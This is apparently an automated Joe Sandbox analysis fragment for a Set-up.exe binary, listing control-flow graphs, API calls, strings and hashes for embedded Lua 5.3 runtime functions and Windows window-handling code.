                                                                                          • String ID: !\?.dll;!\..\lib\lua\5.3\?.dll;!\loadall.dll;.\?.dll$!\lua\?.lua;!\lua\?\init.lua;!\?.lua;!\?\init.lua;!\..\share\lua\5.3\?.lua;!\..\share\lua\5.3\?\init.lua;.\?.lua;.\?\init.lua$LUA_CPATH$LUA_PATH$\;?!-$_LOADED$_PRELOAD$__gc$config$cpath$loaded$multiple Lua VMs detected$path$preload$searchers$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2697978218-2629491146
                                                                                          • Opcode ID: 6033ab77129c6ca3817294e6d9bbb4ea2500b53a0bf93c09879dde7422bc9518
                                                                                          • Instruction ID: 876311684b3ba8705d3abf28126b49b8015f6c35de8625fd5e2506f60168328a
                                                                                          • Opcode Fuzzy Hash: 6033ab77129c6ca3817294e6d9bbb4ea2500b53a0bf93c09879dde7422bc9518
                                                                                          • Instruction Fuzzy Hash: 69D18F70600209ABDB10EF19D882E7EB7E2FF84324F14C199F91D5B392DB75E8219B81

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(user32.dll,70576E16), ref: 00A73B9D
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00A73BD3
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A73BDE
                                                                                          • DeleteDC.GDI32(00000000), ref: 00A73BEA
                                                                                          • LoadLibraryExW.KERNEL32(shcore.dll,00000000,00000800), ref: 00A73C05
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00A73C1A
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00A73C83
                                                                                          • RegisterClassExW.USER32(00000030), ref: 00A73C99
                                                                                          • LoadCursorW.USER32(00000000), ref: 00A73CF7
                                                                                          • RegisterClassExW.USER32(00000030), ref: 00A73D07
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 00A73D26
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00A73D33
                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00A73D40
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDpiForSystem), ref: 00A73D4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Load$ClassCursorRegister$CapsCompatibleCreateDeleteDeviceHandleLibraryModule
                                                                                          • String ID: 0$0$AdjustWindowRectExForDpi$CallTip$GetDpiForMonitor$GetDpiForSystem$GetDpiForWindow$GetSystemMetricsForDpi$ListBoxX$shcore.dll$user32.dll
                                                                                          • API String ID: 3087350144-1889033847
                                                                                          • Opcode ID: cb3fc626a2114c339985bbd65662e7d4268a2b7c2b8decee1374c5d18e51f168
                                                                                          • Instruction ID: a950a397c25f8bf7a56f0fc13b99c7a40374c8339b482a0d48853d9a316094c5
                                                                                          • Opcode Fuzzy Hash: cb3fc626a2114c339985bbd65662e7d4268a2b7c2b8decee1374c5d18e51f168
                                                                                          • Instruction Fuzzy Hash: BD5105B1D017189BEB20DFE5DC48B8EBBF8EB08714F11411AE509AB2A0DBF95508CF95

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 970 bda500-bda544 971 bda546-bda54d 970->971 972 bda54f-bda552 971->972 973 bda584-bda589 971->973 976 bda554 972->976 977 bda563-bda565 972->977 974 bda5de-bda601 973->974 975 bda58b-bda58e 973->975 978 bda603-bda60f lua_pushfstring 974->978 979 bda612-bda61f lua_checkstack 974->979 980 bda590-bda59c 975->980 981 bda557-bda559 976->981 982 bda575 977->982 983 bda567-bda56c 977->983 978->979 986 bda625-bda63d call bf3400 979->986 987 bda837-bda842 luaL_error 979->987 984 bda59e-bda5a3 980->984 985 bda5d5 980->985 981->977 988 bda55b-bda561 981->988 990 bda577-bda579 982->990 983->982 989 bda56e-bda573 983->989 992 bda5a5 984->992 993 bda5b4-bda5b6 984->993 991 bda5d7-bda5d9 985->991 1003 bda640 986->1003 988->977 988->981 989->990 995 bda57b-bda57f 990->995 996 bda581 990->996 991->980 997 bda5db 991->997 998 bda5a8-bda5aa 992->998 1000 bda5b8-bda5bd 993->1000 1001 bda5c4 993->1001 995->971 996->973 997->974 998->993 1002 bda5ac-bda5b2 998->1002 1000->1001 1004 bda5bf-bda5c2 1000->1004 1005 bda5c6-bda5c8 1001->1005 1002->993 1002->998 1006 bda644-bda64b 1003->1006 1004->1005 1007 bda5ca-bda5d0 1005->1007 1008 bda5d2 1005->1008 1009 bda64d-bda64f call be5d20 1006->1009 1010 bda654-bda65b 1006->1010 1007->991 1008->985 1009->1010 1012 bda65d-bda660 1010->1012 1013 bda686 1010->1013 1015 bda671-bda673 1012->1015 1016 bda662 1012->1016 1014 bda688-bda68b 1013->1014 1018 bda7cf-bda7e5 1014->1018 1019 bda691-bda69c 1014->1019 1015->1013 1017 bda675-bda67a 1015->1017 1020 bda665-bda667 1016->1020 1017->1013 1022 bda67c-bda684 1017->1022 1023 bda7e7-bda7f0 call bfb8a0 1018->1023 1024 bda7f2-bda7f4 1018->1024 1025 bda69e-bda6c4 call bf3400 1019->1025 1026 bda6d8-bda701 lua_getinfo lua_pushfstring 1019->1026 1020->1015 1021 bda669-bda66f 1020->1021 1021->1015 1021->1020 1022->1014 1029 bda816-bda81d 1023->1029 1024->1029 1030 bda7f6-bda812 call bf33b0 1024->1030 1041 bda6cd-bda6d3 1025->1041 1042 bda6c6-bda6c8 call be5d20 1025->1042 1031 bda703-bda70f lua_pushfstring 1026->1031 1032 bda712-bda738 call bf3400 1026->1032 1037 bda81f-bda821 call be5d20 1029->1037 1038 bda826-bda836 call bfdf64 1029->1038 1030->1029 1031->1032 1046 bda73a-bda73c call be5d20 1032->1046 1047 bda741-bda74f call bda3d0 1032->1047 1037->1038 1041->1010 1042->1041 1046->1047 1052 bda751-bda777 call bf3400 1047->1052 1053 bda780-bda796 1047->1053 1052->1053 1061 bda779-bda77b call be5d20 1052->1061 1055 bda798-bda7a1 call bfb8a0 1053->1055 1056 bda7a6-bda7a8 1053->1056 1055->1006 1056->1006 1057 bda7ae-bda7ca call bf33b0 1056->1057 1057->1003 1061->1053
                                                                                          APIs
                                                                                          • lua_pushfstring.SET-UP(?,%s,?), ref: 00BDA60A
                                                                                          • lua_checkstack.SET-UP(?,0000000A), ref: 00BDA615
                                                                                          • lua_getinfo.SET-UP(?,Slnt,?), ref: 00BDA6E2
                                                                                          • lua_pushfstring.SET-UP(?,%s:,?), ref: 00BDA6F4
                                                                                          • lua_pushfstring.SET-UP(?,%d:,?), ref: 00BDA70A
                                                                                          • luaL_error.SET-UP(?,stack overflow), ref: 00BDA83D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_pushfstring$L_errorlua_checkstacklua_getinfo
                                                                                          • String ID: %s:$(...tail calls...)$...$ in $%d:$%s$%s expected, got %s$Slnt$bad argument #%d (%s)$bad argument #%d to '%s' (%s)$calling '%s' on bad self (%s)$light userdata$method$stack overflow$stack traceback:
                                                                                          • API String ID: 581061927-4051906992
                                                                                          • Opcode ID: 5187faad012c05c20e5e4ec1c1318dc65aac82050fad695a67566320f9199ccb
                                                                                          • Instruction ID: 8aa8d10be19e53c2f9df20ab9585542b887bdb0115f05b144fcd44c0b6ea1b0f
                                                                                          • Opcode Fuzzy Hash: 5187faad012c05c20e5e4ec1c1318dc65aac82050fad695a67566320f9199ccb
                                                                                          • Instruction Fuzzy Hash: EAB191746006058BDB28DF28D591A6EF7F6EF40304B5485AED846DB782FB34ED05CB82

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1065 bdc030-bdc067 call bd7fd0 call bfbaf0 call bd7fd0 1072 bdc079-bdc08b call bfac20 1065->1072 1073 bdc069-bdc078 1065->1073 1076 bdc08d-bdc09f 1072->1076 1077 bdc0a0-bdc0d5 luaL_error luaL_callmeta 1072->1077 1079 bdc0fc-bdc108 call bd7fd0 1077->1079 1080 bdc0d7-bdc0e8 call bd7fd0 1077->1080 1087 bdc10e-bdc117 1079->1087 1088 bdc205-bdc21d luaL_getmetafield 1079->1088 1085 bdc2dd-bdc2f1 lua_tolstring 1080->1085 1086 bdc0ee-bdc0f1 1080->1086 1091 bdc0f7 1086->1091 1092 bdc2f2-bdc2fd luaL_error 1086->1092 1087->1088 1093 bdc11d 1087->1093 1089 bdc21f-bdc230 call bd7fd0 1088->1089 1090 bdc265-bdc271 call bd7fd0 1088->1090 1110 bdc25e-bdc263 1089->1110 1111 bdc232-bdc235 1089->1111 1108 bdc27b 1090->1108 1109 bdc273-bdc279 1090->1109 1091->1085 1093->1088 1096 bdc1cd-bdc1f3 call bf3400 1093->1096 1097 bdc124-bdc131 call bd7fd0 1093->1097 1098 bdc197-bdc1a1 lua_pushvalue 1093->1098 1099 bdc1a6-bdc1b7 lua_toboolean 1093->1099 1096->1085 1114 bdc1f9-bdc200 call be5d20 1096->1114 1112 bdc154-bdc161 call bd7fd0 1097->1112 1113 bdc133-bdc14f lua_tointegerx lua_pushfstring 1097->1113 1098->1085 1104 bdc1be-bdc1c8 lua_pushstring 1099->1104 1105 bdc1b9 1099->1105 1104->1085 1105->1104 1116 bdc27e 1108->1116 1109->1116 1115 bdc285-bdc2a1 lua_topointer lua_pushfstring 1110->1115 1117 bdc23b-bdc24b call bed050 1111->1117 1118 bdc237-bdc239 1111->1118 1129 bdc167-bdc174 call bfab90 1112->1129 1130 bdc163-bdc165 1112->1130 1113->1085 1114->1085 1115->1085 1121 bdc2a3-bdc2d9 call bd7fd0 call bd8230 * 3 1115->1121 1116->1115 1127 bdc24d-bdc24f call be5d20 1117->1127 1128 bdc254-bdc259 call bd7fd0 1117->1128 1118->1115 1121->1085 1127->1128 1128->1110 1140 bdc17a 1129->1140 1141 bdc176-bdc178 1129->1141 1134 bdc17e-bdc192 lua_pushfstring 1130->1134 1134->1085 1140->1134 1141->1134
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %s: %p$'__tostring' must return a string$__name$__tostring$false$nil$object length is not an integer$true
                                                                                          • API String ID: 0-553602133
                                                                                          • Opcode ID: 2d7661c4b8220c376b42d51bff0ea2d0c1bfd9a405742e10aba30b79586e37be
                                                                                          • Instruction ID: 9dfb3bd267be9f6d53ed97740c23268bcdfc8b67d1c16df84ad8158ef9f40533
                                                                                          • Opcode Fuzzy Hash: 2d7661c4b8220c376b42d51bff0ea2d0c1bfd9a405742e10aba30b79586e37be
                                                                                          • Instruction Fuzzy Hash: 6D7107756006445BDB24AB789C8696AFBD5DB41320F2486FBF82A4B3D7FE30D805C792

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C38528,00000000), ref: 00BE7DDF
                                                                                          • luaL_newmetatable.SET-UP(?,FILE*), ref: 00BE7DED
                                                                                          • luaL_setfuncs.SET-UP(?,00C38588,00000000), ref: 00BE7E41
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00BE7E55
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00BE7ECF
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00BE7F49
                                                                                            • Part of subcall function 00BE6080: lua_setmetatable.SET-UP(?,000000FE,?,?,00BE7E63), ref: 00BE6116
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BE7F8F
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BE7FA6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: __acrt_iob_func$L_errorL_setfuncs$L_newmetatablelua_setmetatable
                                                                                          • String ID: FILE*$_IO_input$_IO_output$__index$multiple Lua VMs detected$stderr$stdin$stdout$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 3216850321-963560941
                                                                                          • Opcode ID: d9dc2d6c3aae20cec79c06f29d2c4c182ce8b4cc85dbbbab91c053119efbd77e
                                                                                          • Instruction ID: 6f96689d2ac272efe9479664c035bd0901a6e6b2029b39ee25c4aea944c9c122
                                                                                          • Opcode Fuzzy Hash: d9dc2d6c3aae20cec79c06f29d2c4c182ce8b4cc85dbbbab91c053119efbd77e
                                                                                          • Instruction Fuzzy Hash: FA5181B57402404BC754AF299886A1AB7E1EF84324B14C6BDF85A8F3D7EE70D8098B91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1212 a6eac0-a6eb03 1213 a6eeae 1212->1213 1214 a6eb09-a6eb10 1212->1214 1215 a6eeb0-a6eeca call bfdf64 1213->1215 1214->1213 1216 a6ecb7-a6ecf1 call a6b9a0 1214->1216 1217 a6eb17-a6eb36 ImmGetContext 1214->1217 1218 a6ed53-a6ed5c call aa7680 1214->1218 1219 a6ebba-a6ec03 call a6ca10 GetMessageTime call aa8bd0 1214->1219 1220 a6ec08-a6ec5c SetFocus call aa6fb0 1214->1220 1221 a6ed79-a6ed80 1214->1221 1216->1213 1244 a6ecf7-a6ecfe 1216->1244 1229 a6eb45-a6eba5 SetFocus call a6ca10 GetMessageTime 1217->1229 1230 a6eb38-a6eb3f ImmNotifyIME 1217->1230 1232 a6ed61-a6ed74 DefWindowProcW 1218->1232 1219->1213 1245 a6ec5e-a6ec88 call a9a010 call a9b320 1220->1245 1246 a6ec8d-a6ecb2 call a6ca10 GetMessageTime 1220->1246 1225 a6ed82-a6eda9 GetWindowRect PtInRect 1221->1225 1226 a6edae-a6edb5 1221->1226 1225->1232 1234 a6edab 1225->1234 1235 a6edb7-a6edcb SendMessageW 1226->1235 1236 a6edd0-a6edd5 1226->1236 1229->1213 1257 a6ebab-a6ebb5 ImmReleaseContext 1229->1257 1230->1229 1232->1215 1234->1226 1235->1213 1242 a6edd7-a6ede6 DefWindowProcW 1236->1242 1243 a6edeb-a6ee07 1236->1243 1242->1215 1243->1213 1251 a6ee0d-a6ee15 1243->1251 1249 a6ed00-a6ed22 TrackMouseEvent 1244->1249 1250 a6ed28-a6ed4e call a6ca10 GetMessageTime call aa8540 1244->1250 1245->1246 1246->1213 1249->1250 1250->1213 1251->1213 1255 a6ee1b-a6ee1e 1251->1255 1259 a6ee32-a6ee34 1255->1259 1260 a6ee20-a6ee2f 1255->1260 1257->1213 1263 a6ee36 1259->1263 1264 a6ee3b-a6ee55 1259->1264 1260->1259 1263->1264 1270 a6ee57-a6ee60 1264->1270 1271 a6ee62-a6ee72 1264->1271 1272 a6ee75-a6ee79 1270->1272 1271->1272 1273 a6ee9d-a6eea9 call a9c030 1272->1273 1274 a6ee7b-a6ee81 1272->1274 1273->1213 1275 a6ee83-a6ee8e 1274->1275 1276 a6ee90-a6ee9b 1274->1276 1275->1213 1276->1213
                                                                                          APIs
                                                                                          • ImmGetContext.IMM32(?,?,?,?,00000000), ref: 00A6EB24
                                                                                          • ImmNotifyIME.IMM32(00000000,00000015,00000001,00000000,?,00000000), ref: 00A6EB3F
                                                                                          • SetFocus.USER32(?,?,00000000), ref: 00A6EB4B
                                                                                          • GetMessageTime.USER32 ref: 00A6EB63
                                                                                          • ImmReleaseContext.IMM32(?,?,?,00000000), ref: 00A6EBAF
                                                                                          • GetMessageTime.USER32 ref: 00A6EBC4
                                                                                          • SetFocus.USER32(?,?,?,00000000,00000000,?,00000000), ref: 00A6EC0E
                                                                                          • GetMessageTime.USER32 ref: 00A6EC9F
                                                                                          • TrackMouseEvent.USER32(70576E16), ref: 00A6ED22
                                                                                          • GetMessageTime.USER32 ref: 00A6ED39
                                                                                          • DefWindowProcW.USER32(?,?,?,00000000,?,00000000,?,00000000), ref: 00A6ED6E
                                                                                          • GetWindowRect.USER32(?,?), ref: 00A6ED8C
                                                                                          • PtInRect.USER32(?,?,00000000), ref: 00A6EDA1
                                                                                          • SendMessageW.USER32(00000000,?,?,00000000), ref: 00A6EDC5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Time$ContextFocusRectWindow$EventMouseNotifyProcReleaseSendTrack
                                                                                          • String ID: x
                                                                                          • API String ID: 4103674602-2363233923
                                                                                          • Opcode ID: 32523cc29494f67d0abb6d4b7e08c4730196601aba0375effcba44c39a65e9e7
                                                                                          • Instruction ID: a9dab7adb2e69075faa96fc3f1539a5e0a653aefb71420841a5851f048fc42a3
                                                                                          • Opcode Fuzzy Hash: 32523cc29494f67d0abb6d4b7e08c4730196601aba0375effcba44c39a65e9e7
                                                                                          • Instruction Fuzzy Hash: 15D11575A01618EFCB04DFA8D948BEDBFB6FF48310F158159E856B72A4CB315960CB60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1280 beb290-beb2d9 lua_pushfstring getenv 1281 beb2ef-beb31b call bd7fd0 call bd8be0 call bd7fd0 1280->1281 1282 beb2db-beb2e9 getenv 1280->1282 1305 beb32e 1281->1305 1306 beb31d-beb320 1281->1306 1282->1281 1284 beb3a1-beb3b2 1282->1284 1286 beb3bf-beb3d3 call bf3400 1284->1286 1287 beb3b4-beb3bd 1284->1287 1289 beb3d6-beb3e0 1286->1289 1287->1289 1293 beb3ef-beb405 GetModuleFileNameA 1289->1293 1294 beb3e2-beb3e9 call be5d20 1289->1294 1297 beb4fc-beb52e luaL_error luaL_len 1293->1297 1298 beb40b-beb410 1293->1298 1294->1293 1301 beb599-beb5a1 1297->1301 1302 beb530 1297->1302 1298->1297 1303 beb416-beb42a strrchr 1298->1303 1307 beb532-beb535 1302->1307 1308 beb540-beb590 call bd7fd0 call bf7ae0 lua_touserdata FreeLibrary 1302->1308 1303->1297 1304 beb430-beb446 call bd7fd0 1303->1304 1318 beb448-beb44b 1304->1318 1319 beb474-beb476 1304->1319 1313 beb330-beb33f 1305->1313 1311 beb327-beb32c 1306->1311 1312 beb322-beb325 1306->1312 1307->1301 1314 beb537 1307->1314 1327 beb592 1308->1327 1311->1313 1312->1305 1312->1311 1313->1284 1317 beb341-beb39f luaL_gsub * 2 call bd7fd0 call bd8230 * 3 1313->1317 1314->1308 1317->1293 1322 beb44d-beb44f 1318->1322 1323 beb451-beb461 call bed050 1318->1323 1325 beb479-beb4fb luaL_gsub call bd7fd0 call bd8230 * 3 call bd7fd0 call bd9010 call bfdf64 1319->1325 1322->1325 1337 beb46a-beb46f call bd7fd0 1323->1337 1338 beb463-beb465 call be5d20 1323->1338 1327->1301 1331 beb594-beb597 1327->1331 1331->1301 1331->1308 1337->1319 1338->1337
                                                                                          APIs
                                                                                          • lua_pushfstring.SET-UP(?,%s%s,?,_5_3,?,00000001,00BEBFD0), ref: 00BEB2C6
                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00000000,?,%s%s,?,_5_3,?,00000001,00BEBFD0), ref: 00BEB2CC
                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?), ref: 00BEB2DC
                                                                                          • luaL_gsub.SET-UP(?,00000000,00C60480,00C60484), ref: 00BEB34D
                                                                                          • luaL_gsub.SET-UP(?,00000000,00C6047C,?,?,00000000,00C60480,00C60484), ref: 00BEB35F
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00BEB3FD
                                                                                          • strrchr.VCRUNTIME140 ref: 00BEB41F
                                                                                          • luaL_gsub.SET-UP(?,?,00C604B8,?), ref: 00BEB487
                                                                                          • luaL_error.SET-UP(?,unable to get ModuleFileName), ref: 00BEB502
                                                                                            • Part of subcall function 00BDAA50: luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B
                                                                                            • Part of subcall function 00BDAA50: lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
                                                                                            • Part of subcall function 00BDAA50: lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
                                                                                            • Part of subcall function 00BDAA50: lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
                                                                                            • Part of subcall function 00BDAA50: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98
                                                                                          • luaL_len.SET-UP(?,00000001,00000000,000000E0,?,?,?,?,unable to get ModuleFileName), ref: 00BEB520
                                                                                          • lua_touserdata.SET-UP(?,000000FF,00000000,?,?,unable to get ModuleFileName), ref: 00BEB575
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,unable to get ModuleFileName), ref: 00BEB57E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_gsub$getenv$FileFreeL_errorL_lenL_whereLibraryModuleName_errnolua_concatlua_errorlua_pushfstringlua_pushvfstringlua_touserdatastrrchr
                                                                                          • String ID: %s%s$LUA_NOENV$_5_3$unable to get ModuleFileName
                                                                                          • API String ID: 1848715694-2004867651
                                                                                          • Opcode ID: a44cb950e1e6d5fd7e4bbdb9dbfbe8ca2e5c1641a363fce4d0232145304acc3d
                                                                                          • Instruction ID: 51c38b8c0585174f9674e0dfb43df8541523b4f2ca1f87b14bc654692ea9080d
                                                                                          • Opcode Fuzzy Hash: a44cb950e1e6d5fd7e4bbdb9dbfbe8ca2e5c1641a363fce4d0232145304acc3d
                                                                                          • Instruction Fuzzy Hash: 18810970A006445BDB24AF298C82E6BB7E5EF44320F1486F9F51A973D6EB70DC41CB91
                                                                                          APIs
                                                                                          • ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001), ref: 00A884AA
                                                                                          • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 00A884CA
                                                                                          • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00A884E2
                                                                                          • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 00A88506
                                                                                          • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 00A8852A
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00A88547
                                                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00A88562
                                                                                          • ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001), ref: 00A8865A
